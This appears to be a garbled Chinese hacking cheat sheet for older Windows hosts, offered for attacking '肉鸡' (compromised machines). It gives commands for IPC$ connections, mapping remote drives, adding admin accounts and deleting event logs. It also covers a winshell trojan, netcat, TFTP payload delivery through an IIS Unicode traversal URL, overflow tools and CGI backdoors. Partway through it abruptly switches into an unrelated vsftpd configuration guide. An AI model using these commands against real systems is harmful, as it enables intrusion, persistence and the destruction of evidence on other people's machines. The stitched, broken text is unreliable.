地址如何通过IP查主机

nbtstat-a 192.168.1.10

用这个格式就行了192.168.1.10是对方ip地址

或者net view对方ip

1.知道对方ip查看对方的计算机名

方法开始->运行->cmd->net view对方ip

或者开始->运行->cmd->nbtstat-a对方ip

2.知道对方计算机名查看对方ip

方法开始->运行->cmd->ping对方计算机名

或者开始->运行->cmd->nb tsta t-a对方计算机名

与远程主机建立空管连接 net use\\IP地址\ipc$ " " /use:" "

以管理员身份登录远程主机 net use\\IP地址\ipc$ "密码" /use:"Administrator"传送文件到远程主机WINNT目录下 copy本机目录路径\程序\\IP地址\admin$查看远程主机时间 net time\\IP地址

定时启动某个程序 at \\IP地址02:18 re adme.exe

查看共享 net view\\IP地址

查看netb io s工作组列表 nb tstat -A IP地址

将远程主机C盘映射为自己的F盘 net us e f: \\IP地址\c$ " " /us er:"

Ad min i s t rato r"

这两条把自己增加到管理员组  net user用户名密码/addnet lo calgroup Admini strators用户名/add

断开连接 net use\\IP地址\ipc$/delete

=====================================================

擦屁屁del C:\winnt\system32\lo gfiles\*.*

de l C:\winnt\syste m32\c onfig\*.evtde l C:\winnt\s ys te m32\dtc log\*.*de l C:\winnt\system32\*.lo gde l C:\winnt\system32\*.txtde l C:\winnt\*.txtde l C:\winnt\*.lo g

============================

一、 netsvc.exe

下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务ne ts vc/list\\IP地址netsvc schedule\\IP地址/querynets vc\\IP地址schedul e/start

二、 OpenTelnet.exe

远程启动主机的Te lne t服务并绑定端口到7878例如

OpenTelnet\\IP地址用户名密码17878

然后就可以te lne t到主机的7878端口进入DO S方式下te lnet IP地址7878

三、winshe ll.exe

一个非常小的木马不到6K  te lnet到主机的7878端口输入密码wins he l l 当看到CMD>后可打下面的命令p Path 查看winshell主程序的路径信息b reBoot 重新启动机器

d shutD own 关闭机器s Shell 执行后你就会看到可爱的“C:\>”x eXit 退出本次登录会话此命令并不终止winshell的运行

CMD>http://. . ./srv.exe 通过http下载其他网站上的文件到运行winshell的机器上

四、 3389登陆器 GUI方式登录远程主机的

五、 elsave.exe

事件日志清除工具elsave-s \\IP地址-l "application" -Celsave-s \\IP地址-l "system" -Ce lsa ve-s \\IP地址-l "se curity"-C

执行后成功清除应用程序日志系统日志安全日志

六、 hbulot.exe

开启win2 kserver和winxp的3389服务hbulo t [/r]

使用/r表示安装完成后自动重起目标使设置生效。

七、 nc.exe(netcat.exe)

一个很好的工具一些脚本程序都要用到它也可做溢出后的连接用。想要连接到某处:nc[-options]hostname port[s] [ports] . . .

绑定端口等待连接:nc-l-p port [-options] [hostname] [port]

参数:

-e prog程序重定向一旦连接就执行[危险! !]

-g gateway source-routing hop point[s],up to 8

-G num s ource-routing p ointer:4, 8, 12, . . .

-h帮助信息

-i secs延时的间隔

-l监听模式用于入站连接

-n指定数字的IP地址不能用ho stname

-o file记录16进制的传输

-p port本地端口号

-r任意指定本地及远程端口

-s addr本地源地址

-uUDP模式

-v详细输出——用两个-v可得到更详细的内容

-w secs timeout的时间

-z将输入输出关掉——用于扫描时

八、 TFTPD32.EXE

把自己的电脑临时变为一台F T P服务器让肉鸡来下载文件 tftp命令要在肉鸡上执行通常要利用Unicode漏洞或te lnet到肉鸡例如http://IP地址/s cripts/. .%255c. .%255c/winnt/system32/cmd.exe?/c tftp-i本机IP地址get文件名c:\winnt\system32\文件名

然后可以直接令文件运行http://IP地址/s cripts/. .%255 c. .%255c/winnt/system32/cmd.exe?/c+文件名

九、 prihack.exe是IIS的p rinter远程缓冲区溢出工具。 idqo ver.e xe是溢出idq的选择“溢出后在一个端口监听” 然后用te lne t连接它的监听端口如果溢出成功一连它的端口绑定的命令马上执行。 xp lo it.e xe是一个图形界面的id a溢出成功以后w inxp下需要打w inxp。

一○、 ntis.exe、 cmd.exe和cmdasp.asp是三个cgi-backdoor exe要放到cgi-bin目录下 asp放到有ASP执行权限的目录。然后用IE浏览器连接。

一、一Xscan命令行运行参数说明

在检测过程中按" [空格]"键可以查看各线程状态及扫描进度按"q"键保存当前数据后提前退出程序按" "强行关闭程序。

1.命令格式:xscan-host [-] [其他选项]xsc an-file[其他选项]

其中含义如下:

-port :检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表)

-ftp :检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件)-ntpas s :检测NT-Server弱口令(可通过\dat\co nfig.ini文件设置用户名/密码字典文件)

-cgi :检测CGI漏洞(可通过\dat\c onfig.ini文件的"CGI-EN CODE\encode_typ e"项设置编码方案)

-iis :检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案)

[其他选项]含义如下:

-v:显示详细扫描进度

-p:跳过Ping不通的主机

-o:跳过没有检测到开放端口的主机

-t :指定最大并发线程数量和并发主机数量,默认数量为100,10chown_uploads

chown_uploads=NO

设定禁止上传文件更改宿主。

#chown_username=whoever

chroot_local_user=YES

设定登陆后.只可以访问自己的属主目录.不可访问上一层目录文件

#directory. If chroot_local_user is YES, then this list becomes a list of

#users to NOT chroot().

#chroot_list_enab le=YES

chro ot_li st_enable=NO

禁止用户登出自己的FTP主目录。

#(default follows)

#chro ot_li st_file=/e tc/vs ftpd/chroo t_lis t

#

#You may activate the "-R"option to the builtin ls.This is disabled by

#default to avoid remote users being able to cause excessive I/O on large

#sites.However, some broken F TP clients such as "ncftp"and"mirror"assume#the presence ofthe "-R"option, so there is a strong case for enabling it.

#ls_re curse_enab le=YE S

ls_recurse_enab le=NO

禁止用户登陆FTP后使用"ls -R"的命令。该命令会对服务器性能造成巨大开销。如果该项被允许那么挡多用户同时使用该命

令时将会对该服务器造成威胁。

#When"listen"directive is enabled,vsftpd runs in standalone mode and

#listens on IPv4 sockets.This directive cannot be used in conjunction

#with the listen_ipv6 directive.listen=YES

设定该Vs ftpd服务工作在StandAlo ne模式下。顺便展开说明一下所谓

StandAlo ne模式就是该服务拥有自己的守护进程支持

在ps -A命令下我们将可用看到vs ftpd的守护进程名。如果不想工作在StandAlo ne模式下则可以选择SuperDaemo n模式在该

模式下vs ftpd将没有自己的守护进程而是由超级守护进程Xinetd全权代理与此同时 Vs ftp服务的许多功能将得不到实现pam_service_name=vs ftpd

设定PAM服务下Vsftpd的验证配置文件名。因此 PAM验证将参考/etc/pam.d/下的vsftpd文件配置。userlist_enab le=YES

设定userli st_file中的用户将不得使用FTP。tcp_wrapp ers=YES

设定支持TCP Wrappers。 #KC:The following entries are added for supportingvirtual ftp users.

以下这些是关于Vsftpd虚拟用户支持的重要配置项目。默认Vsftpd.conf中不包含这些设定项目需要自己手动添加配置。guest_enab le=YES

设定启用虚拟用户功能。guest_username=virtus ers

指定虚拟用户的宿主用户。virtual_use_local_privs=YES

设定虚拟用户的权限符合他们的宿主用户。user_config_dir=/etc/vsftpd/vconf

设定虚拟用户个人Vs ftp的配置文件存放路径。也就是说这个被指定的目录里将存放每个Vs ftp虚拟用户个性的配置文件

一个需要注意的地方就是这些配置文件名必须和虚拟用户名相同。保存退出。